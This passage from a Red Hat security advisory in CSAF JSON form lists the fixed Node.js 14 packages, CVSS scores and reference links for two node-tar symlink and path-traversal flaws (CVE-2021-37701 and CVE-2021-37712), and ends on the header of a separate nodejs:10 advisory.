"category": "external", "summary": "RHBZ#1999731", "url": "https://bugzilla.redhat.com/show_bug.cgi?id=1999731" }, { "category": "external", "summary": "https://www.cve.org/CVERecord?id=CVE-2021-37701", "url": "https://www.cve.org/CVERecord?id=CVE-2021-37701" }, { "category": "external", "summary": "https://nvd.nist.gov/vuln/detail/CVE-2021-37701", "url": "https://nvd.nist.gov/vuln/detail/CVE-2021-37701" }, { "category": "external", "summary": "https://github.com/npm/node-tar/security/advisories/GHSA-9r2w-394v-53qc", "url": "https://github.com/npm/node-tar/security/advisories/GHSA-9r2w-394v-53qc" }, { "category": "external", "summary": "https://www.npmjs.com/advisories/1779", "url": "https://www.npmjs.com/advisories/1779" } ], "release_date": "2021-08-31T00:00:00+00:00", "remediations": [ { "category": "vendor_fix", "date": "2022-02-01T21:18:22+00:00", "details": "For details on how to apply this update, which includes the changes described in this advisory, refer to:\n\nhttps://access.redhat.com/articles/11258", "product_ids": [ "AppStream-8.5.0.Z.MAIN:nodejs:14:8050020211213115342:c5368500", "AppStream-8.5.0.Z.MAIN:nodejs:14:8050020211213115342:c5368500:nodejs-1:14.18.2-2.module+el8.5.0+13644+8d46dafd.aarch64", "AppStream-8.5.0.Z.MAIN:nodejs:14:8050020211213115342:c5368500:nodejs-1:14.18.2-2.module+el8.5.0+13644+8d46dafd.ppc64le", "AppStream-8.5.0.Z.MAIN:nodejs:14:8050020211213115342:c5368500:nodejs-1:14.18.2-2.module+el8.5.0+13644+8d46dafd.s390x", "AppStream-8.5.0.Z.MAIN:nodejs:14:8050020211213115342:c5368500:nodejs-1:14.18.2-2.module+el8.5.0+13644+8d46dafd.src", "AppStream-8.5.0.Z.MAIN:nodejs:14:8050020211213115342:c5368500:nodejs-1:14.18.2-2.module+el8.5.0+13644+8d46dafd.x86_64", "AppStream-8.5.0.Z.MAIN:nodejs:14:8050020211213115342:c5368500:nodejs-debuginfo-1:14.18.2-2.module+el8.5.0+13644+8d46dafd.aarch64", "AppStream-8.5.0.Z.MAIN:nodejs:14:8050020211213115342:c5368500:nodejs-debuginfo-1:14.18.2-2.module+el8.5.0+13644+8d46dafd.ppc64le", "AppStream-8.5.0.Z.MAIN:nodejs:14:8050020211213115342:c5368500:nodejs-debuginfo-1:14.18.2-2.module+el8.5.0+13644+8d46dafd.s390x", "AppStream-8.5.0.Z.MAIN:nodejs:14:8050020211213115342:c5368500:nodejs-debuginfo-1:14.18.2-2.module+el8.5.0+13644+8d46dafd.x86_64", "AppStream-8.5.0.Z.MAIN:nodejs:14:8050020211213115342:c5368500:nodejs-debugsource-1:14.18.2-2.module+el8.5.0+13644+8d46dafd.aarch64", "AppStream-8.5.0.Z.MAIN:nodejs:14:8050020211213115342:c5368500:nodejs-debugsource-1:14.18.2-2.module+el8.5.0+13644+8d46dafd.ppc64le", "AppStream-8.5.0.Z.MAIN:nodejs:14:8050020211213115342:c5368500:nodejs-debugsource-1:14.18.2-2.module+el8.5.0+13644+8d46dafd.s390x", "AppStream-8.5.0.Z.MAIN:nodejs:14:8050020211213115342:c5368500:nodejs-debugsource-1:14.18.2-2.module+el8.5.0+13644+8d46dafd.x86_64", "AppStream-8.5.0.Z.MAIN:nodejs:14:8050020211213115342:c5368500:nodejs-devel-1:14.18.2-2.module+el8.5.0+13644+8d46dafd.aarch64", "AppStream-8.5.0.Z.MAIN:nodejs:14:8050020211213115342:c5368500:nodejs-devel-1:14.18.2-2.module+el8.5.0+13644+8d46dafd.ppc64le", "AppStream-8.5.0.Z.MAIN:nodejs:14:8050020211213115342:c5368500:nodejs-devel-1:14.18.2-2.module+el8.5.0+13644+8d46dafd.s390x", "AppStream-8.5.0.Z.MAIN:nodejs:14:8050020211213115342:c5368500:nodejs-devel-1:14.18.2-2.module+el8.5.0+13644+8d46dafd.x86_64", "AppStream-8.5.0.Z.MAIN:nodejs:14:8050020211213115342:c5368500:nodejs-docs-1:14.18.2-2.module+el8.5.0+13644+8d46dafd.noarch", "AppStream-8.5.0.Z.MAIN:nodejs:14:8050020211213115342:c5368500:nodejs-full-i18n-1:14.18.2-2.module+el8.5.0+13644+8d46dafd.aarch64", "AppStream-8.5.0.Z.MAIN:nodejs:14:8050020211213115342:c5368500:nodejs-full-i18n-1:14.18.2-2.module+el8.5.0+13644+8d46dafd.ppc64le", "AppStream-8.5.0.Z.MAIN:nodejs:14:8050020211213115342:c5368500:nodejs-full-i18n-1:14.18.2-2.module+el8.5.0+13644+8d46dafd.s390x", "AppStream-8.5.0.Z.MAIN:nodejs:14:8050020211213115342:c5368500:nodejs-full-i18n-1:14.18.2-2.module+el8.5.0+13644+8d46dafd.x86_64", "AppStream-8.5.0.Z.MAIN:nodejs:14:8050020211213115342:c5368500:nodejs-nodemon-0:2.0.15-1.module+el8.5.0+13504+a2e74d91.noarch", "AppStream-8.5.0.Z.MAIN:nodejs:14:8050020211213115342:c5368500:nodejs-nodemon-0:2.0.15-1.module+el8.5.0+13504+a2e74d91.src", "AppStream-8.5.0.Z.MAIN:nodejs:14:8050020211213115342:c5368500:nodejs-packaging-0:23-3.module+el8.3.0+6519+9f98ed83.noarch", "AppStream-8.5.0.Z.MAIN:nodejs:14:8050020211213115342:c5368500:nodejs-packaging-0:23-3.module+el8.3.0+6519+9f98ed83.src", "AppStream-8.5.0.Z.MAIN:nodejs:14:8050020211213115342:c5368500:npm-1:6.14.15-1.14.18.2.2.module+el8.5.0+13644+8d46dafd.aarch64", "AppStream-8.5.0.Z.MAIN:nodejs:14:8050020211213115342:c5368500:npm-1:6.14.15-1.14.18.2.2.module+el8.5.0+13644+8d46dafd.ppc64le", "AppStream-8.5.0.Z.MAIN:nodejs:14:8050020211213115342:c5368500:npm-1:6.14.15-1.14.18.2.2.module+el8.5.0+13644+8d46dafd.s390x", "AppStream-8.5.0.Z.MAIN:nodejs:14:8050020211213115342:c5368500:npm-1:6.14.15-1.14.18.2.2.module+el8.5.0+13644+8d46dafd.x86_64" ], "restart_required": { "category": "none" }, "url": "https://access.redhat.com/errata/RHSA-2022:0350" } ], "scores": [ { "cvss_v3": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 8.1, "baseSeverity": "HIGH", "confidentialityImpact": "NONE", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "REQUIRED", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:H/A:H", "version": "3.1" }, "products": [ "AppStream-8.5.0.Z.MAIN:nodejs:14:8050020211213115342:c5368500", "AppStream-8.5.0.Z.MAIN:nodejs:14:8050020211213115342:c5368500:nodejs-1:14.18.2-2.module+el8.5.0+13644+8d46dafd.aarch64", "AppStream-8.5.0.Z.MAIN:nodejs:14:8050020211213115342:c5368500:nodejs-1:14.18.2-2.module+el8.5.0+13644+8d46dafd.ppc64le", "AppStream-8.5.0.Z.MAIN:nodejs:14:8050020211213115342:c5368500:nodejs-1:14.18.2-2.module+el8.5.0+13644+8d46dafd.s390x", "AppStream-8.5.0.Z.MAIN:nodejs:14:8050020211213115342:c5368500:nodejs-1:14.18.2-2.module+el8.5.0+13644+8d46dafd.src", "AppStream-8.5.0.Z.MAIN:nodejs:14:8050020211213115342:c5368500:nodejs-1:14.18.2-2.module+el8.5.0+13644+8d46dafd.x86_64", "AppStream-8.5.0.Z.MAIN:nodejs:14:8050020211213115342:c5368500:nodejs-debuginfo-1:14.18.2-2.module+el8.5.0+13644+8d46dafd.aarch64", "AppStream-8.5.0.Z.MAIN:nodejs:14:8050020211213115342:c5368500:nodejs-debuginfo-1:14.18.2-2.module+el8.5.0+13644+8d46dafd.ppc64le", "AppStream-8.5.0.Z.MAIN:nodejs:14:8050020211213115342:c5368500:nodejs-debuginfo-1:14.18.2-2.module+el8.5.0+13644+8d46dafd.s390x", "AppStream-8.5.0.Z.MAIN:nodejs:14:8050020211213115342:c5368500:nodejs-debuginfo-1:14.18.2-2.module+el8.5.0+13644+8d46dafd.x86_64", "AppStream-8.5.0.Z.MAIN:nodejs:14:8050020211213115342:c5368500:nodejs-debugsource-1:14.18.2-2.module+el8.5.0+13644+8d46dafd.aarch64", "AppStream-8.5.0.Z.MAIN:nodejs:14:8050020211213115342:c5368500:nodejs-debugsource-1:14.18.2-2.module+el8.5.0+13644+8d46dafd.ppc64le", "AppStream-8.5.0.Z.MAIN:nodejs:14:8050020211213115342:c5368500:nodejs-debugsource-1:14.18.2-2.module+el8.5.0+13644+8d46dafd.s390x", "AppStream-8.5.0.Z.MAIN:nodejs:14:8050020211213115342:c5368500:nodejs-debugsource-1:14.18.2-2.module+el8.5.0+13644+8d46dafd.x86_64", "AppStream-8.5.0.Z.MAIN:nodejs:14:8050020211213115342:c5368500:nodejs-devel-1:14.18.2-2.module+el8.5.0+13644+8d46dafd.aarch64", "AppStream-8.5.0.Z.MAIN:nodejs:14:8050020211213115342:c5368500:nodejs-devel-1:14.18.2-2.module+el8.5.0+13644+8d46dafd.ppc64le", "AppStream-8.5.0.Z.MAIN:nodejs:14:8050020211213115342:c5368500:nodejs-devel-1:14.18.2-2.module+el8.5.0+13644+8d46dafd.s390x", "AppStream-8.5.0.Z.MAIN:nodejs:14:8050020211213115342:c5368500:nodejs-devel-1:14.18.2-2.module+el8.5.0+13644+8d46dafd.x86_64", "AppStream-8.5.0.Z.MAIN:nodejs:14:8050020211213115342:c5368500:nodejs-docs-1:14.18.2-2.module+el8.5.0+13644+8d46dafd.noarch", "AppStream-8.5.0.Z.MAIN:nodejs:14:8050020211213115342:c5368500:nodejs-full-i18n-1:14.18.2-2.module+el8.5.0+13644+8d46dafd.aarch64", "AppStream-8.5.0.Z.MAIN:nodejs:14:8050020211213115342:c5368500:nodejs-full-i18n-1:14.18.2-2.module+el8.5.0+13644+8d46dafd.ppc64le", "AppStream-8.5.0.Z.MAIN:nodejs:14:8050020211213115342:c5368500:nodejs-full-i18n-1:14.18.2-2.module+el8.5.0+13644+8d46dafd.s390x", "AppStream-8.5.0.Z.MAIN:nodejs:14:8050020211213115342:c5368500:nodejs-full-i18n-1:14.18.2-2.module+el8.5.0+13644+8d46dafd.x86_64", "AppStream-8.5.0.Z.MAIN:nodejs:14:8050020211213115342:c5368500:nodejs-nodemon-0:2.0.15-1.module+el8.5.0+13504+a2e74d91.noarch", "AppStream-8.5.0.Z.MAIN:nodejs:14:8050020211213115342:c5368500:nodejs-nodemon-0:2.0.15-1.module+el8.5.0+13504+a2e74d91.src", "AppStream-8.5.0.Z.MAIN:nodejs:14:8050020211213115342:c5368500:nodejs-packaging-0:23-3.module+el8.3.0+6519+9f98ed83.noarch", "AppStream-8.5.0.Z.MAIN:nodejs:14:8050020211213115342:c5368500:nodejs-packaging-0:23-3.module+el8.3.0+6519+9f98ed83.src", "AppStream-8.5.0.Z.MAIN:nodejs:14:8050020211213115342:c5368500:npm-1:6.14.15-1.14.18.2.2.module+el8.5.0+13644+8d46dafd.aarch64", "AppStream-8.5.0.Z.MAIN:nodejs:14:8050020211213115342:c5368500:npm-1:6.14.15-1.14.18.2.2.module+el8.5.0+13644+8d46dafd.ppc64le", "AppStream-8.5.0.Z.MAIN:nodejs:14:8050020211213115342:c5368500:npm-1:6.14.15-1.14.18.2.2.module+el8.5.0+13644+8d46dafd.s390x", "AppStream-8.5.0.Z.MAIN:nodejs:14:8050020211213115342:c5368500:npm-1:6.14.15-1.14.18.2.2.module+el8.5.0+13644+8d46dafd.x86_64" ] } ], "threats": [ { "category": "impact", "details": "Moderate" } ], "title": "nodejs-tar: Insufficient symlink protection due to directory cache poisoning using symbolic links allowing arbitrary file creation and overwrite" }, { "cve": "CVE-2021-37712", "cwe": { "id": "CWE-22", "name": "Improper Limitation of a Pathname to a Restricted Directory (\u0027Path Traversal\u0027)" }, "discovery_date": "2021-08-31T00:00:00+00:00", "ids": [ { "system_name": "Red Hat Bugzilla ID", "text": "1999739" } ], "notes": [ { "category": "description", "text": "A flaw was found in the npm package \"tar\" (aka node-tar). Extracting tar files that contain two directories and a symlink with names containing Unicode values that normalize to the same value on Windows systems made it possible to bypass node-tar symlink checks on directories. This allows an untrusted tar file to extract and overwrite files into an arbitrary location. The highest threat from this vulnerability is to integrity and system availability.", "title": "Vulnerability description" }, { "category": "summary", "text": "nodejs-tar: Insufficient symlink protection due to directory cache poisoning using symbolic links allowing arbitrary file creation and overwrite", "title": "Vulnerability summary" }, { "category": "other", "text": "Red Hat Enterprise Linux version 8 and Red Hat Software Collection both embed `node-tar` in the npm command. However, npm explicitly prevents the extraction of symlink via a filter. npm might still be affected via node-gyp, if the attacker is able to control the target URL.", "title": "Statement" }, { "category": "general", "text": "The CVSS score(s) listed for this vulnerability do not reflect the associated product\u0027s status, and are included for informational purposes to better understand the severity of this vulnerability.", "title": "CVSS score applicability" } ], "product_status": { "fixed": [ "AppStream-8.5.0.Z.MAIN:nodejs:14:8050020211213115342:c5368500", "AppStream-8.5.0.Z.MAIN:nodejs:14:8050020211213115342:c5368500:nodejs-1:14.18.2-2.module+el8.5.0+13644+8d46dafd.aarch64", "AppStream-8.5.0.Z.MAIN:nodejs:14:8050020211213115342:c5368500:nodejs-1:14.18.2-2.module+el8.5.0+13644+8d46dafd.ppc64le", "AppStream-8.5.0.Z.MAIN:nodejs:14:8050020211213115342:c5368500:nodejs-1:14.18.2-2.module+el8.5.0+13644+8d46dafd.s390x", "AppStream-8.5.0.Z.MAIN:nodejs:14:8050020211213115342:c5368500:nodejs-1:14.18.2-2.module+el8.5.0+13644+8d46dafd.src", "AppStream-8.5.0.Z.MAIN:nodejs:14:8050020211213115342:c5368500:nodejs-1:14.18.2-2.module+el8.5.0+13644+8d46dafd.x86_64", "AppStream-8.5.0.Z.MAIN:nodejs:14:8050020211213115342:c5368500:nodejs-debuginfo-1:14.18.2-2.module+el8.5.0+13644+8d46dafd.aarch64", "AppStream-8.5.0.Z.MAIN:nodejs:14:8050020211213115342:c5368500:nodejs-debuginfo-1:14.18.2-2.module+el8.5.0+13644+8d46dafd.ppc64le", "AppStream-8.5.0.Z.MAIN:nodejs:14:8050020211213115342:c5368500:nodejs-debuginfo-1:14.18.2-2.module+el8.5.0+13644+8d46dafd.s390x", "AppStream-8.5.0.Z.MAIN:nodejs:14:8050020211213115342:c5368500:nodejs-debuginfo-1:14.18.2-2.module+el8.5.0+13644+8d46dafd.x86_64", "AppStream-8.5.0.Z.MAIN:nodejs:14:8050020211213115342:c5368500:nodejs-debugsource-1:14.18.2-2.module+el8.5.0+13644+8d46dafd.aarch64", "AppStream-8.5.0.Z.MAIN:nodejs:14:8050020211213115342:c5368500:nodejs-debugsource-1:14.18.2-2.module+el8.5.0+13644+8d46dafd.ppc64le", "AppStream-8.5.0.Z.MAIN:nodejs:14:8050020211213115342:c5368500:nodejs-debugsource-1:14.18.2-2.module+el8.5.0+13644+8d46dafd.s390x", "AppStream-8.5.0.Z.MAIN:nodejs:14:8050020211213115342:c5368500:nodejs-debugsource-1:14.18.2-2.module+el8.5.0+13644+8d46dafd.x86_64", "AppStream-8.5.0.Z.MAIN:nodejs:14:8050020211213115342:c5368500:nodejs-devel-1:14.18.2-2.module+el8.5.0+13644+8d46dafd.aarch64", "AppStream-8.5.0.Z.MAIN:nodejs:14:8050020211213115342:c5368500:nodejs-devel-1:14.18.2-2.module+el8.5.0+13644+8d46dafd.ppc64le", "AppStream-8.5.0.Z.MAIN:nodejs:14:8050020211213115342:c5368500:nodejs-devel-1:14.18.2-2.module+el8.5.0+13644+8d46dafd.s390x", "AppStream-8.5.0.Z.MAIN:nodejs:14:8050020211213115342:c5368500:nodejs-devel-1:14.18.2-2.module+el8.5.0+13644+8d46dafd.x86_64", "AppStream-8.5.0.Z.MAIN:nodejs:14:8050020211213115342:c5368500:nodejs-docs-1:14.18.2-2.module+el8.5.0+13644+8d46dafd.noarch", "AppStream-8.5.0.Z.MAIN:nodejs:14:8050020211213115342:c5368500:nodejs-full-i18n-1:14.18.2-2.module+el8.5.0+13644+8d46dafd.aarch64", "AppStream-8.5.0.Z.MAIN:nodejs:14:8050020211213115342:c5368500:nodejs-full-i18n-1:14.18.2-2.module+el8.5.0+13644+8d46dafd.ppc64le", "AppStream-8.5.0.Z.MAIN:nodejs:14:8050020211213115342:c5368500:nodejs-full-i18n-1:14.18.2-2.module+el8.5.0+13644+8d46dafd.s390x", "AppStream-8.5.0.Z.MAIN:nodejs:14:8050020211213115342:c5368500:nodejs-full-i18n-1:14.18.2-2.module+el8.5.0+13644+8d46dafd.x86_64", "AppStream-8.5.0.Z.MAIN:nodejs:14:8050020211213115342:c5368500:nodejs-nodemon-0:2.0.15-1.module+el8.5.0+13504+a2e74d91.noarch", "AppStream-8.5.0.Z.MAIN:nodejs:14:8050020211213115342:c5368500:nodejs-nodemon-0:2.0.15-1.module+el8.5.0+13504+a2e74d91.src", "AppStream-8.5.0.Z.MAIN:nodejs:14:8050020211213115342:c5368500:nodejs-packaging-0:23-3.module+el8.3.0+6519+9f98ed83.noarch", "AppStream-8.5.0.Z.MAIN:nodejs:14:8050020211213115342:c5368500:nodejs-packaging-0:23-3.module+el8.3.0+6519+9f98ed83.src", "AppStream-8.5.0.Z.MAIN:nodejs:14:8050020211213115342:c5368500:npm-1:6.14.15-1.14.18.2.2.module+el8.5.0+13644+8d46dafd.aarch64", "AppStream-8.5.0.Z.MAIN:nodejs:14:8050020211213115342:c5368500:npm-1:6.14.15-1.14.18.2.2.module+el8.5.0+13644+8d46dafd.ppc64le", "AppStream-8.5.0.Z.MAIN:nodejs:14:8050020211213115342:c5368500:npm-1:6.14.15-1.14.18.2.2.module+el8.5.0+13644+8d46dafd.s390x", "AppStream-8.5.0.Z.MAIN:nodejs:14:8050020211213115342:c5368500:npm-1:6.14.15-1.14.18.2.2.module+el8.5.0+13644+8d46dafd.x86_64" ] }, "references": [ { "category": "self", "summary": "Canonical URL", "url": "https://access.redhat.com/security/cve/CVE-2021-37712" }, { "category": "external", "summary": "RHBZ#1999739", "url": "https://bugzilla.redhat.com/show_bug.cgi?id=1999739" }, { "category": "external", "summary": "https://www.cve.org/CVERecord?id=CVE-2021-37712", "url": "https://www.cve.org/CVERecord?id=CVE-2021-37712" }, { "category": "external", "summary": "https://nvd.nist.gov/vuln/detail/CVE-2021-37712", "url": "https://nvd.nist.gov/vuln/detail/CVE-2021-37712" }, { "category": "external", "summary": "https://github.com/npm/node-tar/security/advisories/GHSA-qq89-hq3f-393p", "url": "https://github.com/npm/node-tar/security/advisories/GHSA-qq89-hq3f-393p" }, { "category": "external", "summary": "https://www.npmjs.com/advisories/1780", "url": "https://www.npmjs.com/advisories/1780" } ], "release_date": "2021-08-31T00:00:00+00:00", "remediations": [ { "category": "vendor_fix", "date": "2022-02-01T21:18:22+00:00", "details": "For details on how to apply this update, which includes the changes described in this advisory, refer to:\n\nhttps://access.redhat.com/articles/11258", "product_ids": [ "AppStream-8.5.0.Z.MAIN:nodejs:14:8050020211213115342:c5368500", "AppStream-8.5.0.Z.MAIN:nodejs:14:8050020211213115342:c5368500:nodejs-1:14.18.2-2.module+el8.5.0+13644+8d46dafd.aarch64", "AppStream-8.5.0.Z.MAIN:nodejs:14:8050020211213115342:c5368500:nodejs-1:14.18.2-2.module+el8.5.0+13644+8d46dafd.ppc64le", "AppStream-8.5.0.Z.MAIN:nodejs:14:8050020211213115342:c5368500:nodejs-1:14.18.2-2.module+el8.5.0+13644+8d46dafd.s390x", "AppStream-8.5.0.Z.MAIN:nodejs:14:8050020211213115342:c5368500:nodejs-1:14.18.2-2.module+el8.5.0+13644+8d46dafd.src", "AppStream-8.5.0.Z.MAIN:nodejs:14:8050020211213115342:c5368500:nodejs-1:14.18.2-2.module+el8.5.0+13644+8d46dafd.x86_64", "AppStream-8.5.0.Z.MAIN:nodejs:14:8050020211213115342:c5368500:nodejs-debuginfo-1:14.18.2-2.module+el8.5.0+13644+8d46dafd.aarch64", "AppStream-8.5.0.Z.MAIN:nodejs:14:8050020211213115342:c5368500:nodejs-debuginfo-1:14.18.2-2.module+el8.5.0+13644+8d46dafd.ppc64le", "AppStream-8.5.0.Z.MAIN:nodejs:14:8050020211213115342:c5368500:nodejs-debuginfo-1:14.18.2-2.module+el8.5.0+13644+8d46dafd.s390x", "AppStream-8.5.0.Z.MAIN:nodejs:14:8050020211213115342:c5368500:nodejs-debuginfo-1:14.18.2-2.module+el8.5.0+13644+8d46dafd.x86_64", "AppStream-8.5.0.Z.MAIN:nodejs:14:8050020211213115342:c5368500:nodejs-debugsource-1:14.18.2-2.module+el8.5.0+13644+8d46dafd.aarch64", "AppStream-8.5.0.Z.MAIN:nodejs:14:8050020211213115342:c5368500:nodejs-debugsource-1:14.18.2-2.module+el8.5.0+13644+8d46dafd.ppc64le", "AppStream-8.5.0.Z.MAIN:nodejs:14:8050020211213115342:c5368500:nodejs-debugsource-1:14.18.2-2.module+el8.5.0+13644+8d46dafd.s390x", "AppStream-8.5.0.Z.MAIN:nodejs:14:8050020211213115342:c5368500:nodejs-debugsource-1:14.18.2-2.module+el8.5.0+13644+8d46dafd.x86_64", "AppStream-8.5.0.Z.MAIN:nodejs:14:8050020211213115342:c5368500:nodejs-devel-1:14.18.2-2.module+el8.5.0+13644+8d46dafd.aarch64", "AppStream-8.5.0.Z.MAIN:nodejs:14:8050020211213115342:c5368500:nodejs-devel-1:14.18.2-2.module+el8.5.0+13644+8d46dafd.ppc64le", "AppStream-8.5.0.Z.MAIN:nodejs:14:8050020211213115342:c5368500:nodejs-devel-1:14.18.2-2.module+el8.5.0+13644+8d46dafd.s390x", "AppStream-8.5.0.Z.MAIN:nodejs:14:8050020211213115342:c5368500:nodejs-devel-1:14.18.2-2.module+el8.5.0+13644+8d46dafd.x86_64", "AppStream-8.5.0.Z.MAIN:nodejs:14:8050020211213115342:c5368500:nodejs-docs-1:14.18.2-2.module+el8.5.0+13644+8d46dafd.noarch", "AppStream-8.5.0.Z.MAIN:nodejs:14:8050020211213115342:c5368500:nodejs-full-i18n-1:14.18.2-2.module+el8.5.0+13644+8d46dafd.aarch64", "AppStream-8.5.0.Z.MAIN:nodejs:14:8050020211213115342:c5368500:nodejs-full-i18n-1:14.18.2-2.module+el8.5.0+13644+8d46dafd.ppc64le", "AppStream-8.5.0.Z.MAIN:nodejs:14:8050020211213115342:c5368500:nodejs-full-i18n-1:14.18.2-2.module+el8.5.0+13644+8d46dafd.s390x", "AppStream-8.5.0.Z.MAIN:nodejs:14:8050020211213115342:c5368500:nodejs-full-i18n-1:14.18.2-2.module+el8.5.0+13644+8d46dafd.x86_64", "AppStream-8.5.0.Z.MAIN:nodejs:14:8050020211213115342:c5368500:nodejs-nodemon-0:2.0.15-1.module+el8.5.0+13504+a2e74d91.noarch", "AppStream-8.5.0.Z.MAIN:nodejs:14:8050020211213115342:c5368500:nodejs-nodemon-0:2.0.15-1.module+el8.5.0+13504+a2e74d91.src", "AppStream-8.5.0.Z.MAIN:nodejs:14:8050020211213115342:c5368500:nodejs-packaging-0:23-3.module+el8.3.0+6519+9f98ed83.noarch", "AppStream-8.5.0.Z.MAIN:nodejs:14:8050020211213115342:c5368500:nodejs-packaging-0:23-3.module+el8.3.0+6519+9f98ed83.src", "AppStream-8.5.0.Z.MAIN:nodejs:14:8050020211213115342:c5368500:npm-1:6.14.15-1.14.18.2.2.module+el8.5.0+13644+8d46dafd.aarch64", "AppStream-8.5.0.Z.MAIN:nodejs:14:8050020211213115342:c5368500:npm-1:6.14.15-1.14.18.2.2.module+el8.5.0+13644+8d46dafd.ppc64le", "AppStream-8.5.0.Z.MAIN:nodejs:14:8050020211213115342:c5368500:npm-1:6.14.15-1.14.18.2.2.module+el8.5.0+13644+8d46dafd.s390x", "AppStream-8.5.0.Z.MAIN:nodejs:14:8050020211213115342:c5368500:npm-1:6.14.15-1.14.18.2.2.module+el8.5.0+13644+8d46dafd.x86_64" ], "restart_required": { "category": "none" }, "url": "https://access.redhat.com/errata/RHSA-2022:0350" } ], "scores": [ { "cvss_v3": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 8.1, "baseSeverity": "HIGH", "confidentialityImpact": "NONE", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "REQUIRED", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:H/A:H", "version": "3.1" }, "products": [ "AppStream-8.5.0.Z.MAIN:nodejs:14:8050020211213115342:c5368500", "AppStream-8.5.0.Z.MAIN:nodejs:14:8050020211213115342:c5368500:nodejs-1:14.18.2-2.module+el8.5.0+13644+8d46dafd.aarch64", "AppStream-8.5.0.Z.MAIN:nodejs:14:8050020211213115342:c5368500:nodejs-1:14.18.2-2.module+el8.5.0+13644+8d46dafd.ppc64le", "AppStream-8.5.0.Z.MAIN:nodejs:14:8050020211213115342:c5368500:nodejs-1:14.18.2-2.module+el8.5.0+13644+8d46dafd.s390x", "AppStream-8.5.0.Z.MAIN:nodejs:14:8050020211213115342:c5368500:nodejs-1:14.18.2-2.module+el8.5.0+13644+8d46dafd.src", "AppStream-8.5.0.Z.MAIN:nodejs:14:8050020211213115342:c5368500:nodejs-1:14.18.2-2.module+el8.5.0+13644+8d46dafd.x86_64", "AppStream-8.5.0.Z.MAIN:nodejs:14:8050020211213115342:c5368500:nodejs-debuginfo-1:14.18.2-2.module+el8.5.0+13644+8d46dafd.aarch64", "AppStream-8.5.0.Z.MAIN:nodejs:14:8050020211213115342:c5368500:nodejs-debuginfo-1:14.18.2-2.module+el8.5.0+13644+8d46dafd.ppc64le", "AppStream-8.5.0.Z.MAIN:nodejs:14:8050020211213115342:c5368500:nodejs-debuginfo-1:14.18.2-2.module+el8.5.0+13644+8d46dafd.s390x", "AppStream-8.5.0.Z.MAIN:nodejs:14:8050020211213115342:c5368500:nodejs-debuginfo-1:14.18.2-2.module+el8.5.0+13644+8d46dafd.x86_64", "AppStream-8.5.0.Z.MAIN:nodejs:14:8050020211213115342:c5368500:nodejs-debugsource-1:14.18.2-2.module+el8.5.0+13644+8d46dafd.aarch64", "AppStream-8.5.0.Z.MAIN:nodejs:14:8050020211213115342:c5368500:nodejs-debugsource-1:14.18.2-2.module+el8.5.0+13644+8d46dafd.ppc64le", "AppStream-8.5.0.Z.MAIN:nodejs:14:8050020211213115342:c5368500:nodejs-debugsource-1:14.18.2-2.module+el8.5.0+13644+8d46dafd.s390x", "AppStream-8.5.0.Z.MAIN:nodejs:14:8050020211213115342:c5368500:nodejs-debugsource-1:14.18.2-2.module+el8.5.0+13644+8d46dafd.x86_64", "AppStream-8.5.0.Z.MAIN:nodejs:14:8050020211213115342:c5368500:nodejs-devel-1:14.18.2-2.module+el8.5.0+13644+8d46dafd.aarch64", "AppStream-8.5.0.Z.MAIN:nodejs:14:8050020211213115342:c5368500:nodejs-devel-1:14.18.2-2.module+el8.5.0+13644+8d46dafd.ppc64le", "AppStream-8.5.0.Z.MAIN:nodejs:14:8050020211213115342:c5368500:nodejs-devel-1:14.18.2-2.module+el8.5.0+13644+8d46dafd.s390x", "AppStream-8.5.0.Z.MAIN:nodejs:14:8050020211213115342:c5368500:nodejs-devel-1:14.18.2-2.module+el8.5.0+13644+8d46dafd.x86_64", "AppStream-8.5.0.Z.MAIN:nodejs:14:8050020211213115342:c5368500:nodejs-docs-1:14.18.2-2.module+el8.5.0+13644+8d46dafd.noarch", "AppStream-8.5.0.Z.MAIN:nodejs:14:8050020211213115342:c5368500:nodejs-full-i18n-1:14.18.2-2.module+el8.5.0+13644+8d46dafd.aarch64", "AppStream-8.5.0.Z.MAIN:nodejs:14:8050020211213115342:c5368500:nodejs-full-i18n-1:14.18.2-2.module+el8.5.0+13644+8d46dafd.ppc64le", "AppStream-8.5.0.Z.MAIN:nodejs:14:8050020211213115342:c5368500:nodejs-full-i18n-1:14.18.2-2.module+el8.5.0+13644+8d46dafd.s390x", "AppStream-8.5.0.Z.MAIN:nodejs:14:8050020211213115342:c5368500:nodejs-full-i18n-1:14.18.2-2.module+el8.5.0+13644+8d46dafd.x86_64", "AppStream-8.5.0.Z.MAIN:nodejs:14:8050020211213115342:c5368500:nodejs-nodemon-0:2.0.15-1.module+el8.5.0+13504+a2e74d91.noarch", "AppStream-8.5.0.Z.MAIN:nodejs:14:8050020211213115342:c5368500:nodejs-nodemon-0:2.0.15-1.module+el8.5.0+13504+a2e74d91.src", "AppStream-8.5.0.Z.MAIN:nodejs:14:8050020211213115342:c5368500:nodejs-packaging-0:23-3.module+el8.3.0+6519+9f98ed83.noarch", "AppStream-8.5.0.Z.MAIN:nodejs:14:8050020211213115342:c5368500:nodejs-packaging-0:23-3.module+el8.3.0+6519+9f98ed83.src", "AppStream-8.5.0.Z.MAIN:nodejs:14:8050020211213115342:c5368500:npm-1:6.14.15-1.14.18.2.2.module+el8.5.0+13644+8d46dafd.aarch64", "AppStream-8.5.0.Z.MAIN:nodejs:14:8050020211213115342:c5368500:npm-1:6.14.15-1.14.18.2.2.module+el8.5.0+13644+8d46dafd.ppc64le", "AppStream-8.5.0.Z.MAIN:nodejs:14:8050020211213115342:c5368500:npm-1:6.14.15-1.14.18.2.2.module+el8.5.0+13644+8d46dafd.s390x", "AppStream-8.5.0.Z.MAIN:nodejs:14:8050020211213115342:c5368500:npm-1:6.14.15-1.14.18.2.2.module+el8.5.0+13644+8d46dafd.x86_64" ] } ], "threats": [ { "category": "impact", "details": "Moderate" } ], "title": "nodejs-tar: Insufficient symlink protection due to directory cache poisoning using symbolic links allowing arbitrary file creation and overwrite" } ] }
rhsa-2021_0548
Vulnerability from csaf_redhat
Published
2021-02-16 14:25
Modified
2024-11-15 09:39
Summary
Red Hat Security Advisory: nodejs:10 security update
Notes
Topic
